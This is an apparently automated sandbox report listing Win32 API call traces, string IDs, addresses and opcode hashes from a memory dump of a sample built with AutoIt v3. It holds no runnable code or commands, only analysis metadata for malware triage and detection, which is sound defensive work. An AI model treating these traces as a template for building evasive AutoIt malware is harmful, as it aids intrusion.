                                                                      • API ID: Destroy$ImageList_MessageSendWindow$DeleteObject$IconInvalidateMoveRectRemove
                                                                      • String ID: 0
                                                                      • API String ID: 464785882-4108050209
                                                                      • Opcode ID: 5ec00df950997b923ba4a64ab4d87d1c9534da7214f586eefa6bd329fb96cfae
                                                                      • Instruction ID: df2ef6d5792170da2b84d0c1df00e0358662fb8d586ef7fb16002ae7075d33cc
                                                                      • Opcode Fuzzy Hash: 5ec00df950997b923ba4a64ab4d87d1c9534da7214f586eefa6bd329fb96cfae
                                                                      • Instruction Fuzzy Hash: 21128C30601201AFEB55CF24C888BE9BFA5FF84308F558569E595CB262C731EC96DB91
                                                                      APIs
                                                                      • DestroyWindow.USER32(00000000), ref: 005874DE
                                                                      • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 0058759D
                                                                      • SetRect.USER32(?,00000000,00000000,0000012C,00000064), ref: 005875DB
                                                                      • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000006), ref: 005875ED
                                                                      • CreateWindowExW.USER32(00000006,AutoIt v3,?,88C00000,?,?,?,?,00000000,00000000,00000000), ref: 00587633
                                                                      • GetClientRect.USER32(00000000,?), ref: 0058763F
                                                                      • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000), ref: 00587683
                                                                      • CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 00587692
                                                                      • GetStockObject.GDI32(00000011), ref: 005876A2
                                                                      • SelectObject.GDI32(00000000,00000000), ref: 005876A6
                                                                      • GetTextFaceW.GDI32(00000000,00000040,?,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,?), ref: 005876B6
                                                                      • GetDeviceCaps.GDI32(00000000,0000005A), ref: 005876BF
                                                                      • DeleteDC.GDI32(00000000), ref: 005876C8
                                                                      • CreateFontW.GDI32(00000000,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 005876F4
                                                                      • SendMessageW.USER32(00000030,00000000,00000001), ref: 0058770B
                                                                      • CreateWindowExW.USER32(00000200,msctls_progress32,00000000,50000001,?,0000001E,00000104,00000014,00000000,00000000,00000000), ref: 00587746
                                                                      • SendMessageW.USER32(00000000,00000401,00000000,00640000), ref: 0058775A
                                                                      • SendMessageW.USER32(00000404,00000001,00000000), ref: 0058776B
                                                                      • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000037,00000500,00000032,00000000,00000000,00000000), ref: 0058779B
                                                                      • GetStockObject.GDI32(00000011), ref: 005877A6
                                                                      • SendMessageW.USER32(00000030,00000000,?,50000000), ref: 005877B1
                                                                      • ShowWindow.USER32(00000004,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,?,?,?,?), ref: 005877BB
                                                                      Strings
                                                                      Similarity
                                                                      • API ID: Window$Create$MessageSend$ObjectRect$Stock$AdjustCapsClientDeleteDestroyDeviceFaceFontInfoParametersSelectShowSystemText
                                                                      • String ID: AutoIt v3$DISPLAY$msctls_progress32$static
                                                                      • API String ID: 2910397461-517079104
                                                                      • Opcode ID: ae66cb85f237147a8bcc67e275406db101f41c6717458a560b567b2e57641afc
                                                                      • Instruction ID: b8058cf752d6c6513d6da82ff98ce755985150e6f3619dfeeede34f84858d82b
                                                                      • Opcode Fuzzy Hash: ae66cb85f237147a8bcc67e275406db101f41c6717458a560b567b2e57641afc
                                                                      • Instruction Fuzzy Hash: 78A15C71A40609BFEB24DBA4DC4AFAE7BA9FB58710F104116FA15E72E0D770AD04DB60
                                                                      APIs
                                                                      • SetErrorMode.KERNEL32(00000001), ref: 0057AD1E
                                                                      • GetDriveTypeW.KERNEL32(?,0059FAC0,?,\\.\,0059F910), ref: 0057ADFB
                                                                      • SetErrorMode.KERNEL32(00000000,0059FAC0,?,\\.\,0059F910), ref: 0057AF59
                                                                      Strings
                                                                      Similarity
                                                                      • API ID: ErrorMode$DriveType
                                                                      • String ID: 1394$ATA$ATAPI$CDROM$Fibre$FileBackedVirtual$Fixed$MMC$Network$PhysicalDrive$RAID$RAMDisk$Removable$SAS$SATA$SCSI$SSA$SSD$USB$Unknown$Virtual$\\.\$iSCSI
                                                                      • API String ID: 2907320926-4222207086
                                                                      • Opcode ID: e4a0ffab4826577c0f828157807395c6cb6a8860efe0ca76e454fc195b456f48
                                                                      • Instruction ID: cd0ead61103230e153771c60f2869f51934abaeb60ba6e18acf9917633911c84
                                                                      • Opcode Fuzzy Hash: e4a0ffab4826577c0f828157807395c6cb6a8860efe0ca76e454fc195b456f48
                                                                      • Instruction Fuzzy Hash: 715190B564820AAE8B10DB50E956DBD7F64FBC8714B20C45BE40AA72D0EA319D41FB43
                                                                      APIs
                                                                      Strings
                                                                      Similarity
                                                                      • API ID: __wcsnicmp
                                                                      • String ID: #OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#pragma compile$#requireadmin$Bad directive syntax error$Cannot parse #include$Unterminated group of comments
                                                                      • API String ID: 1038674560-86951937
                                                                      • Opcode ID: 3b125e3ea3b5bed90c114143fd2bf6901373e88937e35e86e6d34901a6c1b6d9
                                                                      • Instruction ID: d3f322a6ff953a7b6e386a6b34bc4241ec403f3c0785d21f27905e4cedb91893
                                                                      • Opcode Fuzzy Hash: 3b125e3ea3b5bed90c114143fd2bf6901373e88937e35e86e6d34901a6c1b6d9
                                                                      • Instruction Fuzzy Hash: BC8106B0640206ABEF21AE64EC4BFFE3F69FF45704F044024F905AB196EB71DA85D661
                                                                      APIs
                                                                      • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000103,?,?,?), ref: 00599AD2
                                                                      • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 00599B8B
                                                                      • SendMessageW.USER32(?,00001102,00000002,?), ref: 00599BA7
                                                                      Strings
                                                                      Similarity
                                                                      • API ID: MessageSend$Window
                                                                      • String ID: 0
                                                                      • API String ID: 2326795674-4108050209
                                                                      • Opcode ID: 4017dd47b9f0e23679571475a3ab751361663223875255cc36d6c3bb33d8ede3
                                                                      • Instruction ID: 40e5cbbba750320cc2e08b759ee73024d29449bbe59a99961c9f2d86a5b4c8d3
                                                                      • Opcode Fuzzy Hash: 4017dd47b9f0e23679571475a3ab751361663223875255cc36d6c3bb33d8ede3
                                                                      • Instruction Fuzzy Hash: 3C02D070104301AFEB25CF28C889BAABFE9FF89314F04492DF995D62A1D735D944DB92
                                                                      APIs
                                                                      • GetSysColor.USER32(00000012), ref: 0059A903
                                                                      • SetTextColor.GDI32(?,?), ref: 0059A907
                                                                      • GetSysColorBrush.USER32(0000000F), ref: 0059A91D
                                                                      • GetSysColor.USER32(0000000F), ref: 0059A928
                                                                      • CreateSolidBrush.GDI32(?), ref: 0059A92D
                                                                      • GetSysColor.USER32(00000011), ref: 0059A945
                                                                      • CreatePen.GDI32(00000000,00000001,00743C00), ref: 0059A953
                                                                      • SelectObject.GDI32(?,00000000), ref: 0059A964
                                                                      • SetBkColor.GDI32(?,00000000), ref: 0059A96D
                                                                      • SelectObject.GDI32(?,?), ref: 0059A97A
                                                                      • InflateRect.USER32(?,000000FF,000000FF), ref: 0059A999
                                                                      • RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 0059A9B0
                                                                      • GetWindowLongW.USER32(00000000,000000F0), ref: 0059A9C5
                                                                      • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 0059A9ED
                                                                      • GetWindowTextW.USER32(00000000,00000000,00000001), ref: 0059AA14
                                                                      • InflateRect.USER32(?,000000FD,000000FD), ref: 0059AA32
                                                                      • DrawFocusRect.USER32(?,?), ref: 0059AA3D
                                                                      • GetSysColor.USER32(00000011), ref: 0059AA4B
                                                                      • SetTextColor.GDI32(?,00000000), ref: 0059AA53
                                                                      • DrawTextW.USER32(?,00000000,000000FF,?,?), ref: 0059AA67
                                                                      • SelectObject.GDI32(?,0059A5FA), ref: 0059AA7E
                                                                      • DeleteObject.GDI32(?), ref: 0059AA89
                                                                      • SelectObject.GDI32(?,?), ref: 0059AA8F
                                                                      • DeleteObject.GDI32(?), ref: 0059AA94
                                                                      • SetTextColor.GDI32(?,?), ref: 0059AA9A
                                                                      • SetBkColor.GDI32(?,?), ref: 0059AAA4
                                                                      Similarity
                                                                      • API ID: Color$Object$Text$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
                                                                      • String ID:
                                                                      • API String ID: 1996641542-0
                                                                      • Opcode ID: 07a942c4a1bb0626118de044e40941c47ac1874524bf01b4cc7ec6cdf392e4b9
                                                                      • Instruction ID: 0537cddc5cfe3d7fffd8a87b732aeea07ddfc0f19af221e7aed26b3c9b6dedc7
                                                                      • Opcode Fuzzy Hash: 07a942c4a1bb0626118de044e40941c47ac1874524bf01b4cc7ec6cdf392e4b9
                                                                      • Instruction Fuzzy Hash: 67511D71900218EFDF119FA4DC48EAE7BB9FB48320F124526F911EB2A1D7759944EBA0
                                                                      APIs
                                                                      • SendMessageW.USER32(?,00000158,000000FF,0000014E), ref: 00598AC1
                                                                      • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00598AD2
                                                                      • CharNextW.USER32(0000014E), ref: 00598B01
                                                                      • SendMessageW.USER32(?,0000014B,00000000,00000000), ref: 00598B42
                                                                      • SendMessageW.USER32(?,00000158,000000FF,00000158), ref: 00598B58
                                                                      • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00598B69
                                                                      • SendMessageW.USER32(?,000000C2,00000001,0000014E), ref: 00598B86
                                                                      • SetWindowTextW.USER32(?,0000014E), ref: 00598BD8
                                                                      • SendMessageW.USER32(?,000000B1,000F4240,000F423F), ref: 00598BEE
                                                                      • SendMessageW.USER32(?,00001002,00000000,?), ref: 00598C1F
                                                                      • _memset.LIBCMT ref: 00598C44
                                                                      • SendMessageW.USER32(00000000,00001060,00000001,00000004), ref: 00598C8D
                                                                      • _memset.LIBCMT ref: 00598CEC
                                                                      • SendMessageW.USER32(?,00001053,000000FF,?), ref: 00598D16
                                                                      • SendMessageW.USER32(?,00001074,?,00000001), ref: 00598D6E
                                                                      • SendMessageW.USER32(?,0000133D,?,?), ref: 00598E1B
                                                                      • InvalidateRect.USER32(?,00000000,00000001), ref: 00598E3D
                                                                      • GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00598E87
                                                                      • SetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00598EB4
                                                                      • DrawMenuBar.USER32(?), ref: 00598EC3
                                                                      • SetWindowTextW.USER32(?,0000014E), ref: 00598EEB
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1301131953.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                      • Associated: 00000000.00000002.1301114139.0000000000510000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1301189759.000000000059F000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1301189759.00000000005C4000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1301239415.00000000005CE000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1301308798.00000000005D7000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_510000_z6tNjJC614.jbxd
                                                                      Similarity
                                                                      • API ID: MessageSend$Menu$InfoItemTextWindow_memset$CharDrawInvalidateNextRect
                                                                      • String ID: 0
                                                                      • API String ID: 1073566785-4108050209
                                                                      • Opcode ID: 3d737072fb9ce3db37eb05b08a5d4406c94bc69398bd528e0e8ef1940bc12020
                                                                      • Instruction ID: b60cd2fd26b924a85728492940d9e5663082ce81d613487b3049cc7c1e37f46e
                                                                      • Opcode Fuzzy Hash: 3d737072fb9ce3db37eb05b08a5d4406c94bc69398bd528e0e8ef1940bc12020
                                                                      • Instruction Fuzzy Hash: F1E16E71900219ABDF209F64CC88EFE7FB9FF46720F148156F915AA290DB749A84DF60
                                                                      APIs
                                                                      • GetCursorPos.USER32(?), ref: 005949CA
                                                                      • GetDesktopWindow.USER32 ref: 005949DF
                                                                      • GetWindowRect.USER32(00000000), ref: 005949E6
                                                                      • GetWindowLongW.USER32(?,000000F0), ref: 00594A48
                                                                      • DestroyWindow.USER32(?), ref: 00594A74
                                                                      • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,00000003,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 00594A9D
                                                                      • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00594ABB
                                                                      • SendMessageW.USER32(?,00000439,00000000,00000030), ref: 00594AE1
                                                                      • SendMessageW.USER32(?,00000421,?,?), ref: 00594AF6
                                                                      • SendMessageW.USER32(?,0000041D,00000000,00000000), ref: 00594B09
                                                                      • IsWindowVisible.USER32(?), ref: 00594B29
                                                                      • SendMessageW.USER32(?,00000412,00000000,D8F0D8F0), ref: 00594B44
                                                                      • SendMessageW.USER32(?,00000411,00000001,00000030), ref: 00594B58
                                                                      • GetWindowRect.USER32(?,?), ref: 00594B70
                                                                      • MonitorFromPoint.USER32(?,?,00000002), ref: 00594B96
                                                                      • GetMonitorInfoW.USER32(00000000,?), ref: 00594BB0
                                                                      • CopyRect.USER32(?,?), ref: 00594BC7
                                                                      • SendMessageW.USER32(?,00000412,00000000), ref: 00594C32
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1301131953.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                      • Associated: 00000000.00000002.1301114139.0000000000510000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1301189759.000000000059F000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1301189759.00000000005C4000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1301239415.00000000005CE000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1301308798.00000000005D7000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_510000_z6tNjJC614.jbxd
                                                                      Similarity
                                                                      • API ID: MessageSendWindow$Rect$Monitor$CopyCreateCursorDesktopDestroyFromInfoLongPointVisible
                                                                      • String ID: ($0$tooltips_class32
                                                                      • API String ID: 698492251-4156429822
                                                                      • Opcode ID: 5c013feeae9d8b7787d09a316746b4b184f3ec7922290c2c7de683d5e7d3ec4a
                                                                      • Instruction ID: e25aa95d3f1e695a226b398b5c3c5fb4cd3a056274a44ac5032af62e67fef447
                                                                      • Opcode Fuzzy Hash: 5c013feeae9d8b7787d09a316746b4b184f3ec7922290c2c7de683d5e7d3ec4a
                                                                      • Instruction Fuzzy Hash: 60B16871608341AFDB04DF64C848F6ABBE5BB88314F008A19F5999B2A1DB71EC46CF95
                                                                      APIs
                                                                      • GetFileVersionInfoSizeW.VERSION(?,?), ref: 005744AC
                                                                      • GetFileVersionInfoW.VERSION(?,00000000,00000000,00000000,?,?), ref: 005744D2
                                                                      • _wcscpy.LIBCMT ref: 00574500
                                                                      • _wcscmp.LIBCMT ref: 0057450B
                                                                      • _wcscat.LIBCMT ref: 00574521
                                                                      • _wcsstr.LIBCMT ref: 0057452C
                                                                      • VerQueryValueW.VERSION(?,\VarFileInfo\Translation,?,?,?,?,?,?,00000000,?,?), ref: 00574548
                                                                      • _wcscat.LIBCMT ref: 00574591
                                                                      • _wcscat.LIBCMT ref: 00574598
                                                                      • _wcsncpy.LIBCMT ref: 005745C3
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1301131953.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                      • Associated: 00000000.00000002.1301114139.0000000000510000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1301189759.000000000059F000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1301189759.00000000005C4000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1301239415.00000000005CE000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1301308798.00000000005D7000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_510000_z6tNjJC614.jbxd
                                                                      Similarity
                                                                      • API ID: _wcscat$FileInfoVersion$QuerySizeValue_wcscmp_wcscpy_wcsncpy_wcsstr
                                                                      • String ID: %u.%u.%u.%u$04090000$DefaultLangCodepage$StringFileInfo\$\VarFileInfo\Translation
                                                                      • API String ID: 699586101-1459072770
                                                                      • Opcode ID: c3a065299e4c167072da1233d7ea21a6c1a6f26b0dec4762ab237cf383e83f1d
                                                                      • Instruction ID: e0840dae606a60d9be12215db32156f9ddcc9481b5eb160956cb059d8bc1d950
                                                                      • Opcode Fuzzy Hash: c3a065299e4c167072da1233d7ea21a6c1a6f26b0dec4762ab237cf383e83f1d
                                                                      • Instruction Fuzzy Hash: 7D41FB326002117BDB11BB749C4BEBF7FACFF91710F14446AF905E6182EB359901A7A5
                                                                      APIs
                                                                      • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 005128BC
                                                                      • GetSystemMetrics.USER32(00000007), ref: 005128C4
                                                                      • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 005128EF
                                                                      • GetSystemMetrics.USER32(00000008), ref: 005128F7
                                                                      • GetSystemMetrics.USER32(00000004), ref: 0051291C
                                                                      • SetRect.USER32(000000FF,00000000,00000000,000000FF,000000FF), ref: 00512939
                                                                      • AdjustWindowRectEx.USER32(000000FF,?,00000000,?), ref: 00512949
                                                                      • CreateWindowExW.USER32(?,AutoIt v3 GUI,?,?,?,000000FF,000000FF,000000FF,?,00000000,00000000), ref: 0051297C
                                                                      • SetWindowLongW.USER32(00000000,000000EB,00000000), ref: 00512990
                                                                      • GetClientRect.USER32(00000000,000000FF), ref: 005129AE
                                                                      • GetStockObject.GDI32(00000011), ref: 005129CA
                                                                      • SendMessageW.USER32(00000000,00000030,00000000), ref: 005129D5
                                                                        • Part of subcall function 00512344: GetCursorPos.USER32(?), ref: 00512357
                                                                        • Part of subcall function 00512344: ScreenToClient.USER32(005D57B0,?), ref: 00512374
                                                                        • Part of subcall function 00512344: GetAsyncKeyState.USER32(00000001), ref: 00512399
                                                                        • Part of subcall function 00512344: GetAsyncKeyState.USER32(00000002), ref: 005123A7
                                                                      • SetTimer.USER32(00000000,00000000,00000028,00511256), ref: 005129FC
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1301131953.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                      • Associated: 00000000.00000002.1301114139.0000000000510000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1301189759.000000000059F000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1301189759.00000000005C4000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1301239415.00000000005CE000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1301308798.00000000005D7000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_510000_z6tNjJC614.jbxd
                                                                      Similarity
                                                                      • API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
                                                                      • String ID: AutoIt v3 GUI
                                                                      • API String ID: 1458621304-248962490
                                                                      • Opcode ID: 134222fe381f5a1f7e3537485eda1ba4bf806e690fe5b72fa7e3c31bc54375f4
                                                                      • Instruction ID: f302f3dd2a10271319767ac00d9e56940be8946489c960464b00068461474276
                                                                      • Opcode Fuzzy Hash: 134222fe381f5a1f7e3537485eda1ba4bf806e690fe5b72fa7e3c31bc54375f4
                                                                      • Instruction Fuzzy Hash: C7B18D7160120AEFEB14DFA8CC49BED7FB4FB58315F21412AFA15E6290DB749890DB50
                                                                      APIs
                                                                      • GetClassNameW.USER32(?,?,00000100), ref: 0056A47A
                                                                      • __swprintf.LIBCMT ref: 0056A51B
                                                                      • _wcscmp.LIBCMT ref: 0056A52E
                                                                      • SendMessageTimeoutW.USER32(?,?,00000101,00000000,00000002,00001388,?), ref: 0056A583
                                                                      • _wcscmp.LIBCMT ref: 0056A5BF
                                                                      • GetClassNameW.USER32(?,?,00000400), ref: 0056A5F6
                                                                      • GetDlgCtrlID.USER32(?), ref: 0056A648
                                                                      • GetWindowRect.USER32(?,?), ref: 0056A67E
                                                                      • GetParent.USER32(?), ref: 0056A69C
                                                                      • ScreenToClient.USER32(00000000), ref: 0056A6A3
                                                                      • GetClassNameW.USER32(?,?,00000100), ref: 0056A71D
                                                                      • _wcscmp.LIBCMT ref: 0056A731
                                                                      • GetWindowTextW.USER32(?,?,00000400), ref: 0056A757
                                                                      • _wcscmp.LIBCMT ref: 0056A76B
                                                                        • Part of subcall function 0053362C: _iswctype.LIBCMT ref: 00533634
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1301131953.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                      • Associated: 00000000.00000002.1301114139.0000000000510000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1301189759.000000000059F000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1301189759.00000000005C4000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1301239415.00000000005CE000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1301308798.00000000005D7000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_510000_z6tNjJC614.jbxd
                                                                      Similarity
                                                                      • API ID: _wcscmp$ClassName$Window$ClientCtrlMessageParentRectScreenSendTextTimeout__swprintf_iswctype
                                                                      • String ID: %s%u
                                                                      • API String ID: 3744389584-679674701
                                                                      • Opcode ID: 804653d047074758e1543a659cf3cc1b12cb853370d268efc1475083886af935
                                                                      • Instruction ID: aa491163e630bd83360be91c26c8064d457f2843be1a0ebade56c135031d8be9
                                                                      • Opcode Fuzzy Hash: 804653d047074758e1543a659cf3cc1b12cb853370d268efc1475083886af935
                                                                      • Instruction Fuzzy Hash: 5AA1D271204706AFDB14DF64C888BAABBE8FF54355F008529F99AE3190DB30E955CF92
                                                                      APIs
                                                                      • GetClassNameW.USER32(00000008,?,00000400), ref: 0056AF18
                                                                      • _wcscmp.LIBCMT ref: 0056AF29
                                                                      • GetWindowTextW.USER32(00000001,?,00000400), ref: 0056AF51
                                                                      • CharUpperBuffW.USER32(?,00000000), ref: 0056AF6E
                                                                      • _wcscmp.LIBCMT ref: 0056AF8C
                                                                      • _wcsstr.LIBCMT ref: 0056AF9D
                                                                      • GetClassNameW.USER32(00000018,?,00000400), ref: 0056AFD5
                                                                      • _wcscmp.LIBCMT ref: 0056AFE5
                                                                      • GetWindowTextW.USER32(00000002,?,00000400), ref: 0056B00C
                                                                      • GetClassNameW.USER32(00000018,?,00000400), ref: 0056B055
                                                                      • _wcscmp.LIBCMT ref: 0056B065
                                                                      • GetClassNameW.USER32(00000010,?,00000400), ref: 0056B08D
                                                                      • GetWindowRect.USER32(00000004,?), ref: 0056B0F6
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1301131953.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                      • Associated: 00000000.00000002.1301114139.0000000000510000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1301189759.000000000059F000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1301189759.00000000005C4000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1301239415.00000000005CE000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1301308798.00000000005D7000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_510000_z6tNjJC614.jbxd
                                                                      Similarity
                                                                      • API ID: ClassName_wcscmp$Window$Text$BuffCharRectUpper_wcsstr
                                                                      • String ID: @$ThumbnailClass
                                                                      • API String ID: 1788623398-1539354611
                                                                      • Opcode ID: 5e21e8c8578e03fa5a4d16132e0cdbc4d770f1301890ceae8c5b9732e4dfa54b
                                                                      • Instruction ID: 1446be0746ad02e8002dc79e40fb18cbcefabc5ce0900d79c6a8b99e16edc25b
                                                                      • Opcode Fuzzy Hash: 5e21e8c8578e03fa5a4d16132e0cdbc4d770f1301890ceae8c5b9732e4dfa54b
                                                                      • Instruction Fuzzy Hash: 7C818071108206ABEB05DF14C885BAABFE8FF94314F04846AFD85DB095DB34DD89CB62
                                                                      APIs
                                                                        • Part of subcall function 00512612: GetWindowLongW.USER32(?,000000EB), ref: 00512623
                                                                      • DragQueryPoint.SHELL32(?,?), ref: 0059C627
                                                                        • Part of subcall function 0059AB37: ClientToScreen.USER32(?,?), ref: 0059AB60
                                                                        • Part of subcall function 0059AB37: GetWindowRect.USER32(?,?), ref: 0059ABD6
                                                                        • Part of subcall function 0059AB37: PtInRect.USER32(?,?,0059C014), ref: 0059ABE6
                                                                      • SendMessageW.USER32(?,000000B0,?,?), ref: 0059C690
                                                                      • DragQueryFileW.SHELL32(?,000000FF,00000000,00000000), ref: 0059C69B
                                                                      • DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 0059C6BE
                                                                      • _wcscat.LIBCMT ref: 0059C6EE
                                                                      • SendMessageW.USER32(?,000000C2,00000001,?), ref: 0059C705
                                                                      • SendMessageW.USER32(?,000000B0,?,?), ref: 0059C71E
                                                                      • SendMessageW.USER32(?,000000B1,?,?), ref: 0059C735
                                                                      • SendMessageW.USER32(?,000000B1,?,?), ref: 0059C757
                                                                      • DragFinish.SHELL32(?), ref: 0059C75E
                                                                      • DefDlgProcW.USER32(?,00000233,?,00000000,?,?,?), ref: 0059C851
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1301131953.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                      • Associated: 00000000.00000002.1301114139.0000000000510000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1301189759.000000000059F000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1301189759.00000000005C4000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1301239415.00000000005CE000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1301308798.00000000005D7000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_510000_z6tNjJC614.jbxd
                                                                      Similarity
                                                                      • API ID: MessageSend$Drag$Query$FileRectWindow$ClientFinishLongPointProcScreen_wcscat
                                                                      • String ID: @GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID$pb]
                                                                      • API String ID: 169749273-2364637008
                                                                      • Opcode ID: 4787128e05bc791460c4ea9971393f673e44a817bcce299e713c8d840e053163
                                                                      • Instruction ID: 3e51c971e528f8d6853d85dc10cefb7b8f4505cea2fff9371f8462aa66633739
                                                                      • Opcode Fuzzy Hash: 4787128e05bc791460c4ea9971393f673e44a817bcce299e713c8d840e053163
                                                                      • Instruction Fuzzy Hash: 9A615971108301AFDB01EF64D889DABBFE8FFD9750F10092EF595921A1DB309A49DB92
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1301131953.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                      • Associated: 00000000.00000002.1301114139.0000000000510000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1301189759.000000000059F000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1301189759.00000000005C4000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1301239415.00000000005CE000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1301308798.00000000005D7000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_510000_z6tNjJC614.jbxd
                                                                      Similarity
                                                                      • API ID: __wcsnicmp
                                                                      • String ID: ACTIVE$ALL$CLASSNAME=$HANDLE=$LAST$REGEXP=$[ACTIVE$[ALL$[CLASS:$[HANDLE:$[LAST$[REGEXPTITLE:
                                                                      • API String ID: 1038674560-1810252412
                                                                      • Opcode ID: ebd51728a6cea8b4544ca0522dfdaade7338aab1bdefdfda13119b6e437a1ac7
                                                                      • Instruction ID: 76595a21e78da609682353a10f61a4c07372cd879ad31dee4a614f0aa94d8c8a
                                                                      • Opcode Fuzzy Hash: ebd51728a6cea8b4544ca0522dfdaade7338aab1bdefdfda13119b6e437a1ac7
                                                                      • Instruction Fuzzy Hash: 4A31613198820EAAEB14EA94DD0BFEE7F74BB58710F600419B401724D1FF616F44CE52
                                                                      APIs
                                                                      • LoadCursorW.USER32(00000000,00007F8A), ref: 00585013
                                                                      • LoadCursorW.USER32(00000000,00007F00), ref: 0058501E
